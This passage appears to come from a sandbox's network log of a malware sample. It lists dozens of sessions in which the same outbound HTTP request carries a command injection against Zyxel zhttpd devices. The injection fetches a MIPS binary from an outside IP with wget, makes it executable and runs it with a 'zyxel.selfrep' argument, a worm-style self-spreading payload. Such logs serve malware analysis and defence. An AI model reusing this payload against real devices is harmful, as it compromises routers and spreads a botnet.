                                          Jan 14, 2024 15:46:01.706113100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          746192.168.2.2335164109.229.134.129443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.706159115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          747192.168.2.235723283.91.183.146443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.706161976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          748192.168.2.233673471.194.215.36443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.706163883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          749192.168.2.234028685.47.74.185443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.706201077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          750192.168.2.2344452112.196.17.101443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.706242085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          751192.168.2.2354810189.2.217.235443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.706247091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          752192.168.2.2349868109.221.190.248443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.706278086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          753192.168.2.2345236141.101.199.100443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.706307888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          754192.168.2.235973254.16.62.221443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.706315041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          755192.168.2.234091218.97.190.3443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.706341028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          756192.168.2.233911641.136.127.86443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.706352949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          757192.168.2.2340828153.170.90.125443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.706387043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          758192.168.2.234856865.219.109.41443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.706438065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          759192.168.2.234422212.59.230.193443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.706449032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          760192.168.2.234637253.255.170.147443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.706491947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          761192.168.2.2343302193.51.241.72443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.706505060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          762192.168.2.23512661.156.160.233443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.706530094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          763192.168.2.2355532223.170.203.139443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.706571102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          764192.168.2.2357634147.105.133.181443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.706598043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          765192.168.2.235863036.93.128.54443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.706613064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          766192.168.2.2334556216.106.122.2443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.706645966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          767192.168.2.2336044118.224.62.226443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.706705093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          768192.168.2.2353540108.140.226.215443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.706705093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          769192.168.2.234220065.38.153.104443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.706727982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          770192.168.2.2340746184.245.148.48443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.706742048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          771192.168.2.2345618118.195.135.15443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.706768990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          772192.168.2.233609491.177.45.120443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.706799984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          773192.168.2.234608851.112.208.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.706825972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          774192.168.2.2357776173.106.201.139443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.706871033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          775192.168.2.233840270.250.60.123443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.706882954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          776192.168.2.2340980174.245.19.184443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.706903934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          777192.168.2.2334356145.118.133.177443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.706932068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          778192.168.2.234254432.172.3.165443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.706945896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          779192.168.2.235835249.233.150.237443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.706965923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          780192.168.2.235328874.252.253.109443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.706979990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          781192.168.2.2347714192.165.252.70443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.707029104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          782192.168.2.2348232152.98.208.23443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.707065105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          783192.168.2.235699241.74.110.179443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.707093954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          784192.168.2.2340120184.224.148.193443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.707118988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          785192.168.2.2340498192.235.96.129443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.707119942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          786192.168.2.23371589.165.234.9443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.707160950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          787192.168.2.2351984152.120.199.83443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.707200050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          788192.168.2.2347300183.224.185.161443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.707233906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          789192.168.2.2335676146.239.99.144443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.707235098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          790192.168.2.2338888158.93.131.233443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.707263947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          791192.168.2.2351698197.163.206.215443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.707298994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          792192.168.2.233592032.48.167.14443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.707300901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          793192.168.2.2345162207.113.244.192443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.707325935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          794192.168.2.2345538219.86.236.203443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.707370043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          795192.168.2.2337508213.60.64.35443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.707375050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          796192.168.2.2350546138.91.42.238443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.707402945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          797192.168.2.234473093.152.113.66443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.707453012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          798192.168.2.2348704126.47.35.62443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.707468033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          799192.168.2.2333592206.116.204.184443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.707487106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          800192.168.2.233519051.108.0.154443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.707508087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          801192.168.2.2359466204.98.169.175443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.707561016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          802192.168.2.2334454207.184.125.139443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.707576036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          803192.168.2.233887075.203.50.82443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.707611084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          804192.168.2.23456748.204.145.91443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.707654953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          805192.168.2.2352190172.161.46.192443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.707657099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          806192.168.2.2349174216.159.73.182443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.707683086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          807192.168.2.234425273.188.148.115443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.707720041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          808192.168.2.233801065.143.102.129443
                                          TimestampBytes transferredDirectionData
